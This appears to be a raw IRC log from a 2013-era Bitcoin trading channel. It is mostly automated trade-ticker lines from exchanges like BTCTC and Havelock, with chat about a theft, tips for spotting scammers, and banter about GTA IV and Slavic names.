Just-Dice Jul 10 19:07:29 the 21 BTC he stole went to just-dice Jul 10 19:07:31 I had around 1500 that I sold off at the beginning Jul 10 19:07:47 Yeah, I know, mircea. Jul 10 19:08:01 Lots of could/would Jul 10 19:08:52 yeah I know, being an investor those things will haunt you, but gotta learn to live with it lol Jul 10 19:08:56 mjr_: great idea! Jul 10 19:09:08 I can be your scammer for today. Jul 10 19:09:09 i will help anyone who would like to try that suggestion Jul 10 19:09:25 1500? I sold 696 ASICMINER for 0.4 BTC a piece. Jul 10 19:09:28 which one pigeons ? Jul 10 19:09:45 Yeah and yikes hah Jul 10 19:09:48 anyone who would like me to scam them to build their immunity as mjr suggests Jul 10 19:09:50 mjr_ would a donation of 21 BTC directed to me cut it? Jul 10 19:10:39 mjr_: booze fixes everything. Jul 10 19:10:43 [BTCTC] [ASICMINER-PT] 6 @ 4.44 = 26.64 BTC [-] Jul 10 19:10:55 shit 696, oh well I suppose heh Jul 10 19:11:44 pigeons, but you announced it! You're not virulant enough to provide immunity. You need to lie to me, trick me, use subterfuge. Jul 10 19:11:59 Else it doesn't work. Jul 10 19:12:56 but i am paypal verified! Jul 10 19:13:35 or just, being a girl Jul 10 19:13:41 I've had it for today guys. Jul 10 19:13:55 Time to head home and get my mind of this. Jul 10 19:15:17 Cya later mjr_ ! Jul 10 19:15:19 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [-] Jul 10 19:17:07 hmm lemon is scamming in btc land now? Jul 10 19:19:54 Paypal verified = "I'm using someone's else verified Paypal account!" Jul 10 19:20:41 No one serious uses that argument. Jul 10 19:22:20 [BTCTC] [TAT.ASICMINER] 37 @ 0.0425 = 1.5725 BTC [-] Jul 10 19:22:23 [BTCTC] [ASICMINER-PT] 2 @ 4.380001 = 8.76 BTC [-] Jul 10 19:22:24 [BTCTC] [ASICMINER-PT] 2 @ 4.380001 = 8.76 BTC [-] Jul 10 19:22:26 [BTCTC] [ASICMINER-PT] 2 @ 4.38 = 8.76 BTC [-] Jul 10 19:22:28 [BTCTC] [ASICMINER-PT] 2 @ 4.370001 = 8.74 BTC [-] Jul 10 19:22:30 [BTCTC] [ASICMINER-PT] 2 @ 4.37 = 8.74 BTC [-] Jul 10 19:22:31 [BTCTC] [ASICMINER-PT] 1 @ 4.360001 BTC [-] Jul 10 19:22:33 [BTCTC] [ASICMINER-PT] 1 @ 4.3503 BTC [-] Jul 10 19:22:35 [BTCTC] [ASICMINER-PT] 1 @ 4.350005 BTC [-] Jul 10 19:22:36 [BTCTC] [ASICMINER-PT] 1 @ 4.340002 BTC [-] Jul 10 19:22:38 [BTCTC] [ASICMINER-PT] 1 @ 4.330001 BTC [-] Jul 10 19:22:38 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [-] Jul 10 19:22:40 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 10 19:22:42 [BTCTC] [ASICMINER-PT] 1 @ 4.237 BTC [-] Jul 10 19:22:43 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 10 19:22:45 [BTCTC] [ASICMINER-PT] 1 @ 4.15292 BTC [-] Jul 10 19:22:48 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 10 19:22:50 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 10 19:22:53 [BTCTC] [ASICMINER-PT] 2 @ 4.12 = 8.24 BTC [-] Jul 10 19:22:54 sell it! Jul 10 19:23:04 [BTCTC] [ASICMINER-PT] 1 @ 4.111 BTC [-] Jul 10 19:23:05 [BTCTC] [ASICMINER-PT] 1 @ 4.110002 BTC [-] Jul 10 19:23:07 [BTCTC] [ASICMINER-PT] 1 @ 4.110001 BTC [-] Jul 10 19:23:08 [BTCTC] [ASICMINER-PT] 7 @ 4.110001 = 28.77 BTC [-] Jul 10 19:23:10 [BTCTC] [ASICMINER-PT] 48 @ 4.11 = 197.28 BTC [-] Jul 10 19:23:16 sell it all! Jul 10 19:24:06 [BTCTC] [CRYPTO-TRADE] 18 @ 0.198001 = 3.564 BTC [-] Jul 10 19:24:42 [BTCTC] [CRYPTO-TRADE] 2 @ 0.198 = 0.396 BTC [-] Jul 10 19:24:44 [BTCTC] [CRYPTO-TRADE] 2 @ 0.198 = 0.396 BTC [-] Jul 10 19:25:07 ah frak Jul 10 19:25:26 didn't set my sell price Jul 10 19:29:46 mjr_: what's going on? you're bearish on AM? Jul 10 19:31:01 [BTCTC] [ASICMINER-PT] 3 @ 4.11 = 12.33 BTC [-] Jul 10 19:31:18 I always sell/buy my AM shares everyday Jul 10 19:31:18 [HAVELOCK] [VTX] 2 @ 0.810001 = 1.62 BTC [-] Jul 10 19:31:35 [BTCTC] [ASICMINER-PT] 4 @ 4.11 = 16.44 BTC [-] Jul 10 19:31:36 I can usually muster 1-3 btcs out of it daily Jul 10 19:32:48 wow I hate web development Jul 10 19:33:04 what kind Jul 10 19:33:52 [BTCTC] [ASICMINER-PT] 5 @ 4.11 = 20.55 BTC [-] Jul 10 19:34:12 [BTCTC] [ASICMINER-PT] 4 @ 4.11 = 16.44 BTC [-] Jul 10 19:34:39 [BTCTC] [ASICMINER-PT] 2 @ 4.11 = 8.22 BTC [-] Jul 10 19:35:27 is this actually down ? Jul 10 19:35:30 hm Jul 10 19:35:52 [HAVELOCK] [ASICM] 1 @ 0.042986 BTC [-] Jul 10 19:36:39 [BTCTC] [TAT.ASICMINER] 11 @ 0.0425 = 0.4675 BTC [-] Jul 10 19:38:01 [BTCTC] [TAT.ASICMINER] 54 @ 0.0425 = 2.295 BTC [-] Jul 10 19:39:34 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0046 = 0.46 BTC [-] Jul 10 19:41:56 [BTCTC] [TAT.ASICMINER] 25 @ 0.043389 = 1.0847 BTC [+] Jul 10 19:42:52 [BTCTC] [DMS.PURCHASE] 54 @ 0.048832 = 2.6369 BTC [-] Jul 10 19:44:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.043389 = 0.1302 BTC [+] Jul 10 19:46:18 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 10 19:47:06 [HAVELOCK] [ASICM] 1 @ 0.04295 BTC [-] Jul 10 19:47:09 [HAVELOCK] [ASICM] 1 @ 0.04295 BTC [-] Jul 10 19:47:55 [HAVELOCK] [ASICM] 1 @ 0.0429 BTC [-] Jul 10 19:49:52 [BTCTC] [S.MPOE-PT] 1 @ 0.000987 BTC [+] Jul 10 19:53:06 Woow! Divs :D Jul 10 20:00:22 I disagree with the getting to know the other part... It's just that by doing so, your aim shouldn't be to know the other party or act upon any stories he makes up, which is irrelevant to the transaction. Jul 10 20:01:10 Your aim is to discern signs that the person is a scammer. Even if you don't find anything doesn't guarantee the person isn't/ Jul 10 20:01:38 But if you do, it lets you filter right off the bat quite a lot of people. Jul 10 20:02:36 maybe. Jul 10 20:02:48 the skill of being able to make such distinctions however is extremely expensive. Jul 10 20:03:00 imagining one is possesed of it just on the grounds of why not is dangerous. Jul 10 20:04:15 [BTCTC] [DMS.SELLING] 60 @ 0.030999 = 1.8599 BTC [-] Jul 10 20:04:16 [BTCTC] [DMS.SELLING] 40 @ 0.031379 = 1.2552 BTC [+] Jul 10 20:04:29 Ah, of course the point is to not do it if you cannot ignore whatever touching/sob stuff they might come up with. Jul 10 20:05:05 *Announcement* Havelock & TAT Invesments will be launching a new full-share ASICMINER PT. No Mgmt Fees, Full Import/Export Support: https://bitcointalk.org/index.php?topic=253673.0 Jul 10 20:05:07 Just letting them blatter for a few minutes can give off cues. Jul 10 20:05:27 hmmmm Jul 10 20:06:06 I will take part in this, depending on pricing Jul 10 20:06:27 The main one is urgency. Wether it's because the person is a scammer or because the person is legitly in dire need of immediate funds, it's both a bad sign. You'd want to filter these. Jul 10 20:06:51 [BTCTC] [COGNITIVE] 1 @ 0.260001 BTC [+] Jul 10 20:06:58 Being insistent on being trustworthy or making it go through is another. Jul 10 20:07:11 Overly personal sob stories is a third. Jul 10 20:07:42 Things people wouldn't normally be willing to tell strangers. Jul 10 20:07:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 10 20:07:54 It's easy filtering. Jul 10 20:08:33 [BTCTC] [DMS.MINING] 1 @ 0.0186 BTC [-] Jul 10 20:08:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.042999 BTC [-] Jul 10 20:09:09 Once that's said and done, if you don't find anything, you can take the time to check out the person's trustworthiness. Jul 10 20:10:27 The point being, never act on what the person tells you, use what the person tells you to filter them and avoid wasting time. Jul 10 20:10:31 [HAVELOCK] [ASICM] 1 @ 0.04285 BTC [-] Jul 10 20:10:43 [BTCTC] [DMS.PURCHASE] 38 @ 0.048832 = 1.8556 BTC [-] Jul 10 20:10:57 [HAVELOCK] [ASICM] 1 @ 0.0428 BTC [-] Jul 10 20:11:02 [HAVELOCK] [ASICM] 1 @ 0.04275 BTC [-] Jul 10 20:11:08 [HAVELOCK] [ASICM] 2 @ 0.0427 = 0.0854 BTC [-] Jul 10 20:11:13 [HAVELOCK] [ASICM] 2 @ 0.0425 = 0.085 BTC [-] Jul 10 20:11:18 [HAVELOCK] [ASICM] 2 @ 0.0424 = 0.0848 BTC [-] Jul 10 20:11:23 [HAVELOCK] [ASICM] 1 @ 0.0422 BTC [-] Jul 10 20:11:29 [HAVELOCK] [ASICM] 2 @ 0.0421 = 0.0842 BTC [-] Jul 10 20:11:50 [HAVELOCK] [ASICM] 3 @ 0.042001 = 0.126 BTC [-] Jul 10 20:12:56 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 10 20:24:21 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.0047 = 0.1551 BTC [+] Jul 10 20:26:56 [HAVELOCK] [HIM] 1 @ 0.299989 BTC [+] Jul 10 20:27:18 [HAVELOCK] [AM100] 2 @ 0.043398 = 0.0868 BTC Jul 10 20:31:27 woohoo Jul 10 20:31:35 new ticker symbol pushes properly :p Jul 10 20:31:39 (not that i had any doubts) Jul 10 20:32:15 [BTCTC] [DMS.PURCHASE] 5 @ 0.048832 = 0.2442 BTC [-] Jul 10 20:32:52 [HAVELOCK] [AM100] 50 @ 0.042004 = 2.1002 BTC [-] Jul 10 20:33:05 ThickAsThieves Are you here, I need you man? Jul 10 20:33:07 topace that's by default no ? Jul 10 20:33:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 10 20:35:24 San1ty, what's up? Jul 10 20:35:51 ThickAsThieves: check PM Jul 10 20:36:43 [HAVELOCK] [KCIM] 1 @ 0.88 BTC [+] Jul 10 20:38:41 [BTCTC] [DMS.MINING] 20 @ 0.018589 = 0.3718 BTC [-] Jul 10 20:39:00 [MPEX] [S.MPOE] 6286 @ 0.00081026 = 5.0933 BTC [-] Jul 10 20:46:38 [BTCTC] [ASICMINER-PT] 1 @ 4.338 BTC [+] Jul 10 20:46:39 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [+] Jul 10 20:46:41 [BTCTC] [ASICMINER-PT] 1 @ 4.349998 BTC [+] Jul 10 20:46:43 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 10 20:46:44 [BTCTC] [ASICMINER-PT] 2 @ 4.397999 = 8.796 BTC [+] Jul 10 20:46:46 [BTCTC] [ASICMINER-PT] 2 @ 4.397999 = 8.796 BTC [+] Jul 10 20:46:56 [BTCTC] [ASICMINER-PT] 1 @ 4.398 BTC [+] Jul 10 20:46:57 [BTCTC] [ASICMINER-PT] 1 @ 4.39999 BTC [+] Jul 10 20:47:09 [BTCTC] [S.DICE-PT] 1 @ 0.002369 BTC [+] Jul 10 20:48:37 [BTCTC] [TAT.ASICMINER] 41 @ 0.041113 = 1.6856 BTC [-] Jul 10 20:49:03 [BTCTC] [LTC-ATF.B2] 50 @ 0.0135 = 0.675 BTC [-] Jul 10 20:49:04 [BTCTC] [LTC-ATF.B2] 104 @ 0.01399 = 1.455 BTC [+] Jul 10 20:49:05 [BTCTC] [LTC-ATF.B2] 25 @ 0.017 = 0.425 BTC [+] Jul 10 20:49:06 [BTCTC] [LTC-ATF.B2] 65 @ 0.0189 = 1.2285 BTC [+] Jul 10 20:49:14 wow Jul 10 20:49:17 [BTCTC] [ASICMINER-PT] 1 @ 4.39999 BTC [+] Jul 10 20:49:18 idiots Jul 10 20:49:25 that;s a .01 face value bond Jul 10 20:49:28 [BTCTC] [DMS.MINING] 60 @ 0.0182 = 1.092 BTC [-] Jul 10 20:50:14 [BTCTC] [DMS.PURCHASE] 23 @ 0.048832 = 1.1231 BTC [-] Jul 10 20:50:49 [BTCTC] [TAT.ASICMINER] 25 @ 0.042999 = 1.075 BTC [+] Jul 10 20:50:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [+] Jul 10 20:52:07 [BTCTC] [DMS.PURCHASE] 3 @ 0.048832 = 0.1465 BTC [-] Jul 10 20:53:02 -mist- [Global Notice] Sorry for the continued lack of services, we're currently moving it to an alternate location. Thanks for your patience. Jul 10 20:54:37 [BTCTC] [LTC-ATF.B2] 6 @ 0.0189 = 0.1134 BTC [+] Jul 10 20:56:23 [HAVELOCK] [AM100] 9 @ 0.042699 = 0.3843 BTC [+] Jul 10 20:57:39 [HAVELOCK] [HIM] 13 @ 0.289 = 3.757 BTC [-] Jul 10 20:57:56 [HAVELOCK] [AM100] 1 @ 0.04265 BTC [-] Jul 10 20:59:33 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.0047 = 0.2303 BTC [+] Jul 10 21:03:34 [HAVELOCK] [AM100] 2 @ 0.043499 = 0.087 BTC [+] Jul 10 21:05:20 [HAVELOCK] [AM100] 222 @ 0.04200501 = 9.3251 BTC [-] Jul 10 21:05:28 ThickAsThieves: Jul 10 21:05:32 [BTCTC] [S.MPOE-PT] 4 @ 0.000985 = 0.0039 BTC [-] Jul 10 21:05:44 Lets hang out! Jul 10 21:05:51 !ticker m S.MPOE Jul 10 21:05:53 [MPEX:S.MPOE] 1D: 0.00080716 / 0.00081127 / 0.00081531 (229315 shares, 186.04 BTC), 7D: 0.0007725 / 0.00080048 / 0.00081531 (1666543 shares, 1,334.04 BTC), 30D: 0.0006575 / 0.00077201 / 0.00083673 (59800975 shares, 46,167.46 BTC) Jul 10 21:06:16 We may have philosophical differences :D But doesn't mean we can't get drunk on moonshine and geek out over Bitcoin Jul 10 21:06:18 [BTCTC] [LTC-ATF.B2] 70 @ 0.012 = 0.84 BTC [-] Jul 10 21:09:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.042 = 0.252 BTC [-] Jul 10 21:10:04 [BTCTC] [LTC-ATF.B2] 1 @ 0.010101 BTC [-] Jul 10 21:10:05 [BTCTC] [LTC-ATF.B2] 2000 @ 0.0101 = 20.2 BTC [-] Jul 10 21:10:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [-] Jul 10 21:11:24 [BTCTC] [LTC-ATF.B2] 100 @ 0.0105 = 1.05 BTC [+] Jul 10 21:11:29 lol Jul 10 21:11:38 next time you're in north FL maybe Jul 10 21:11:46 [BTCTC] [ASICMINER-PT] 1 @ 4.399 BTC [-] Jul 10 21:11:48 i won't be in ATL for a while Jul 10 21:11:53 [BTCTC] [LTC-ATF.B2] 10 @ 0.0105 = 0.105 BTC [+] Jul 10 21:12:05 [BTCTC] [TAT.ASICMINER] 16 @ 0.042 = 0.672 BTC [-] Jul 10 21:12:16 [BTCTC] [LTC-ATF.B2] 10 @ 0.0105 = 0.105 BTC [+] Jul 10 21:12:37 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004611 = 0.0092 BTC [-] Jul 10 21:12:38 [BTCTC] [TAT.VIRTUALMINE] 26 @ 0.00461 = 0.1199 BTC [-] Jul 10 21:12:51 [BTCTC] [LTC-ATF.B2] 40 @ 0.0105 = 0.42 BTC [+] Jul 10 21:13:25 [BTCTC] [LTC-ATF.B2] 10 @ 0.0105 = 0.105 BTC [+] Jul 10 21:14:18 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.0046 = 0.2162 BTC [-] Jul 10 21:14:46 [BTCTC] [LTC-ATF.B2] 20 @ 0.0105 = 0.21 BTC [+] Jul 10 21:18:21 [BTCTC] [AMC-PT] 1500 @ 0.00245 = 3.675 BTC [-] Jul 10 21:19:51 well my unified theory of coprorate technology doesnt hold Jul 10 21:20:48 that utility of IT is inversely proportional to size of organisation Jul 10 21:20:50 [BTCTC] [LTC-ATF.B2] 1 @ 0.01 BTC [-] Jul 10 21:20:51 [BTCTC] [LTC-ATF.B2] 85 @ 0.01 = 0.85 BTC [-] Jul 10 21:21:11 current employer blown that out of the water Jul 10 21:21:34 [BTCTC] [LTC-ATF.B2] 14 @ 0.01 = 0.14 BTC [-] Jul 10 21:32:42 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.0047 = 0.1269 BTC [+] Jul 10 21:34:06 [BTCTC] [TAT.ASICMINER] 41 @ 0.042899 = 1.7589 BTC [+] Jul 10 21:34:19 [BTCTC] [TAT.ASICMINER] 15 @ 0.0429 = 0.6435 BTC [+] Jul 10 21:34:36 [BTCTC] [TAT.ASICMINER] 16 @ 0.042996 = 0.6879 BTC [+] Jul 10 21:34:50 [BTCTC] [TAT.ASICMINER] 28 @ 0.042998 = 1.2039 BTC [+] Jul 10 21:35:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.043 = 0.86 BTC [+] Jul 10 21:35:36 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0047 = 0.0235 BTC [+] Jul 10 21:35:37 [BTCTC] [TAT.ASICMINER] 23 @ 0.04339 = 0.998 BTC [+] Jul 10 21:38:41 so, there is first slovak news article about coinbr, and thanks to my presentation about bitcoin scams and heists it cointains sentence: Jul 10 21:38:56 Juraj is largely engaged in Bitcoin fraud and theft. Jul 10 21:39:13 [BTCTC] [S.DICE-PT] 200 @ 0.002221 = 0.4442 BTC [-] Jul 10 21:39:16 i can't stop laughing Jul 10 21:40:20 [BTCTC] [BASIC-MINING] 6 @ 0.252001 = 1.512 BTC [-] Jul 10 21:40:56 jurov, you're slovak ? Jul 10 21:41:03 yes Jul 10 21:42:00 nice to see a fellow slovak here Jul 10 21:42:09 lol Jul 10 21:42:22 from BA i suppose Jul 10 21:42:27 scammer if do, scammer if you don't Jul 10 21:42:40 Apocalyptic, yes Jul 10 21:42:42 [HAVELOCK] [AM100] 1 @ 0.043 BTC [+] Jul 10 21:45:28 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [-] Jul 10 21:48:00 [HAVELOCK] [AM100] 48 @ 0.0429 = 2.0592 BTC [-] Jul 10 21:49:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.0435 = 0.1305 BTC [+] Jul 10 21:53:27 [HAVELOCK] [AM100] 8 @ 0.0429 = 0.3432 BTC [-] Jul 10 21:53:28 [HAVELOCK] [AM100] 26 @ 0.042999 = 1.118 BTC [+] Jul 10 21:53:53 [BTCTC] [DMS.PURCHASE] 21 @ 0.048832 = 1.0255 BTC [-] Jul 10 21:56:03 jurov: do you like GTAIV Jul 10 21:56:10 do you relate with Niko Bellic? Jul 10 21:56:11 jkjk Jul 10 21:56:15 I feel racist now. :( Jul 10 21:56:25 not played, just seen the promotional video Jul 10 21:56:36 so, can't say Jul 10 21:57:00 That game taught me Eastern Europeans are super gangsta Jul 10 21:57:23 is it true? Jul 10 21:57:28 [HAVELOCK] [AM100] 41 @ 0.043 = 1.763 BTC [+] Jul 10 21:57:35 [MPEX] [S.MPOE] 7100 @ 0.00081148 = 5.7615 BTC [+] Jul 10 21:57:57 stfu, we are central europeans Jul 10 21:58:17 eastern yurp begins at ukrainian border :D Jul 10 21:58:19 :( Jul 10 21:58:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0435 BTC [+] Jul 10 21:58:28 I wish I was yurpian Jul 10 21:58:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.041119 = 2.056 BTC [-] Jul 10 21:59:11 why? to be gangsta? Jul 10 21:59:44 guessing to be !murican Jul 10 22:00:01 I mean, who would? Jul 10 22:00:16 tbh, there was a gangsta time in 90s, but they have learned quickly Jul 10 22:00:38 now it's all clean white collar stuff Jul 10 22:00:49 BA is all chavs on tour I thought Jul 10 22:01:26 at least, thats the only thing I know about it :) Jul 10 22:01:32 Niko Belic? Nas covjek. Jul 10 22:02:20 yes, he's yugo Jul 10 22:02:33 slovak ppl have names like... richard marcinko Jul 10 22:02:46 google him, irl badass Jul 10 22:04:41 [BTCTC] [LTC-ATF.B2] 10 @ 0.0105 = 0.105 BTC [+] Jul 10 22:04:42 navy Jul 10 22:06:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 10 22:06:19 [BTCTC] [BITVPS] 5 @ 0.002001 = 0.01 BTC [+] Jul 10 22:06:22 lol Jul 10 22:06:27 [BTCTC] [BITVPS] 4 @ 0.002001 = 0.008 BTC [+] Jul 10 22:06:31 [BTCTC] [BITVPS] 417 @ 0.0019 = 0.7923 BTC [-] Jul 10 22:07:06 [BTCTC] [BITVPS] 1538 @ 0.0019 = 2.9222 BTC [-] Jul 10 22:07:17 [BTCTC] [BITVPS] 1 @ 0.0017 BTC [-] Jul 10 22:07:21 [BTCTC] [BITVPS] 1 @ 0.00168 BTC [-] Jul 10 22:07:33 niko belic is more slovenian than serbian or whatever Jul 10 22:07:44 cheezy americans, this 'belic' is funny Jul 10 22:07:53 cause it means 'whitey' Jul 10 22:08:18 it can also mean "whitener" or "cleaner", no? Jul 10 22:08:42 [HAVELOCK] [VTX] 1 @ 0.81 BTC [-] Jul 10 22:08:49 quite befitting name for mass murderer Jul 10 22:10:00 I like to drive around in my white ae86 and try to paint it red pedestrian blood Jul 10 22:10:29 with pedestrians Jul 10 22:10:41 kakobreklaa: you realize GTAIV is a European game no? Jul 10 22:10:52 but there is no such thing as pedestrians in murica, no? Jul 10 22:10:57 nope Jul 10 22:10:58 belic means "small valued money aka change", "fisherman who is catching Belice", "someone who is short of pigment" and more Jul 10 22:10:59 you hit them all Jul 10 22:11:03 does not mean cleaner Jul 10 22:11:30 there is in liberty city Jul 10 22:11:34 is Roman a European name? Jul 10 22:11:40 [BTCTC] [BFMINES] 1 @ 0.004 BTC [+] Jul 10 22:11:54 [HAVELOCK] [HIM] 1 @ 0.298999 BTC [+] Jul 10 22:12:16 thestringpuller: obv since Rome is there Jul 10 22:12:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.042999 BTC [+] Jul 10 22:12:27 har har har har Jul 10 22:12:30 I love it Jul 10 22:12:40 Europe iz soooo cooool Jul 10 22:12:48 kakobreklaa: you're slovenian? Jul 10 22:12:53 close Jul 10 22:12:54 somalian Jul 10 22:13:07 I though somalia was in africa... Jul 10 22:13:17 well get you map straight! Jul 10 22:13:21 are you making fun of me not knowing anything about europe! Jul 10 22:13:42 yes im slovenian but i know the belic family so dont fuck around Jul 10 22:13:54 [BTCTC] [ASICMINER-PT] 1 @ 4.379999 BTC [-] Jul 10 22:15:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.042999 BTC [+] Jul 10 22:15:38 [BTCTC] [BFMINES] 4 @ 0.004 = 0.016 BTC [+] Jul 10 22:18:33 [BTCTC] [AMC-PT] 250 @ 0.0024 = 0.6 BTC [-] Jul 10 22:19:18 [BTCTC] [LTC-ATF.B2] 55 @ 0.0105 = 0.5775 BTC [+] Jul 10 22:20:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.0429 = 0.1716 BTC [-] Jul 10 22:21:47 thestringpuller, i speak serbian Jul 10 22:21:54 that niko belic guy from gta doesn't Jul 10 22:22:20 did you ask him? Jul 10 22:22:28 i listened Jul 10 22:22:37 it's some american trying to hard Jul 10 22:22:40 but not getting the accent Jul 10 22:22:42 [MPEX] [S.MPOE] 4000 @ 0.00081111 = 3.2444 BTC [-] Jul 10 22:22:44 [MPEX] [S.MPOE] 16350 @ 0.00081156 = 13.269 BTC [+] Jul 10 22:22:55 [MPEX] [S.MPOE] 7500 @ 0.00081265 = 6.0949 BTC [+] Jul 10 22:23:56 ;;bcstats Jul 10 22:23:59 Current Blocks: 245900 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 51 blocks | Next Difficulty In About: 6 hours, 54 minutes, and 54 seconds | Next Difficulty Estimate: 25975591.8201 | Estimated Percent Change: 21.7492 Jul 10 22:25:27 [BTCTC] [B.YABMC] 1 @ 0.006194 BTC [+] Jul 10 22:26:05 [BTCTC] [B.YABMC] 1 @ 0.006195 BTC [+] Jul 10 22:29:04 [BTCTC] [AMC-PT] 4 @ 0.00249 = 0.01 BTC [+] Jul 10 22:29:11 ;;ticker Jul 10 22:29:13 MtGox BTCUSD ticker | Best bid: 82.20000, Best ask: 82.40000, Bid-ask spread: 0.20000, Last trade: 82.50000, 24 hour volume: 33011.16760651, 24 hour low: 75.50000, 24 hour high: 82.50000, 24 hour vwap: 78.44675 Jul 10 22:29:17 nice Jul 10 22:32:32 [BTCTC] [DMS.MINING] 10 @ 0.018585 = 0.1859 BTC [+] Jul 10 22:33:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [-] Jul 10 22:33:31 sweet, i guess buying at 66 worked out Jul 10 22:35:18 well, the jump is scary Jul 10 22:35:25 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0047 = 0.0423 BTC [+] Jul 10 22:37:41 [HAVELOCK] [AM100] [PAID] 49.32641324 BTC to 250`172 shares, 19717 satoshi per share Jul 10 22:39:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [-] Jul 10 22:40:02 [HAVELOCK] [AM100] 3 @ 0.0429995 = 0.129 BTC [-] Jul 10 22:40:10 [HAVELOCK] [AM100] 24 @ 0.0429995 = 1.032 BTC [-] Jul 10 22:40:26 [HAVELOCK] [AM100] 3 @ 0.0425 = 0.1275 BTC [-] Jul 10 22:40:44 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 10 22:40:46 [BTCTC] [ASICMINER-PT] 2 @ 4.345 = 8.69 BTC [-] Jul 10 22:41:13 [HAVELOCK] [AM100] 2 @ 0.0425 = 0.085 BTC [-] Jul 10 22:41:30 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [+] Jul 10 22:41:39 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [+] Jul 10 22:41:42 [BTCTC] [TAT.ASICMINER] 48 @ 0.042879 = 2.0582 BTC [+] Jul 10 22:41:43 [BTCTC] [TAT.ASICMINER] 14 @ 0.04288 = 0.6003 BTC [+] Jul 10 22:41:45 [BTCTC] [TAT.ASICMINER] 138 @ 0.04289 = 5.9188 BTC [+] Jul 10 22:42:11 ;;bids 0 Jul 10 22:42:16 There are currently 26017603 bitcoins demanded at or over 0.0 USD, worth 11191075.2822 USD in total. | Data vintage: 0.0078 seconds Jul 10 22:42:27 ;;asks 1111111111111111111 Jul 10 22:42:28 There are currently 117730.59 bitcoins offered at or under 1.11111111111e+18 USD, worth 2.99196624921e+12 USD in total. | Data vintage: 12.3883 seconds Jul 10 22:42:56 [HAVELOCK] [AM100] 4 @ 0.0425 = 0.17 BTC [-] Jul 10 22:43:11 was 135K yesterday ! Jul 10 22:43:37 [HAVELOCK] [AM100] 2 @ 0.0425 = 0.085 BTC [-] Jul 10 22:45:35 [HAVELOCK] [AM100] 7 @ 0.0425 = 0.2975 BTC [-] Jul 10 22:46:19 [BTCTC] [DMS.SELLING] 15 @ 0.031249 = 0.4687 BTC [-] Jul 10 22:46:21 [BTCTC] [DMS.SELLING] 15 @ 0.03125 = 0.4688 BTC [+] Jul 10 22:46:22 [BTCTC] [DMS.SELLING] 65 @ 0.0313 = 2.0345 BTC [+] Jul 10 22:48:50 [BTCTC] [ASICMINER-PT] 2 @ 4.38 = 8.76 BTC [+] Jul 10 22:50:49 [HAVELOCK] [AM100] 3 @ 0.04249998 = 0.1275 BTC [-] Jul 10 22:50:49 [HAVELOCK] [AM100] 8 @ 0.0425 = 0.34 BTC [+] Jul 10 22:50:50 [HAVELOCK] [AM100] 5 @ 0.0425 = 0.2125 BTC [+] Jul 10 22:50:51 [HAVELOCK] [AM100] 5 @ 0.0425 = 0.2125 BTC [+] Jul 10 22:50:52 [HAVELOCK] [AM100] 25 @ 0.042949 = 1.0737 BTC [+] Jul 10 22:51:07 [HAVELOCK] [AM100] 1 @ 0.042949 BTC [+] Jul 10 22:51:53 [BTCTC] [DMS.PURCHASE] 50 @ 0.048832 = 2.4416 BTC [-] Jul 10 22:52:04 [BTCTC] [DMS.MINING] 40 @ 0.0182 = 0.728 BTC [-] Jul 10 22:52:05 [BTCTC] [DMS.MINING] 1 @ 0.0181 BTC [-] Jul 10 22:52:06 [BTCTC] [DMS.MINING] 4 @ 0.0181 = 0.0724 BTC [-] Jul 10 22:52:07 [BTCTC] [DMS.MINING] 20 @ 0.0181 = 0.362 BTC [-] Jul 10 22:52:34 [BTCTC] [DMS.PURCHASE] 150 @ 0.048832 = 7.3248 BTC [-] Jul 10 22:53:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.04288 = 0.343 BTC [-] Jul 10 22:55:54 [HAVELOCK] [AM100] 3 @ 0.042949 = 0.1288 BTC [+] Jul 10 22:56:30 [HAVELOCK] [AM100] 45 @ 0.042949 = 1.9327 BTC [+] Jul 10 22:56:45 [MPEX] [S.MPOE] 450 @ 0.00081265 = 0.3657 BTC [+] Jul 10 22:56:46 [MPEX] [S.MPOE] 3850 @ 0.00081285 = 3.1295 BTC [+] Jul 10 22:57:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.04288 = 0.2573 BTC [-] Jul 10 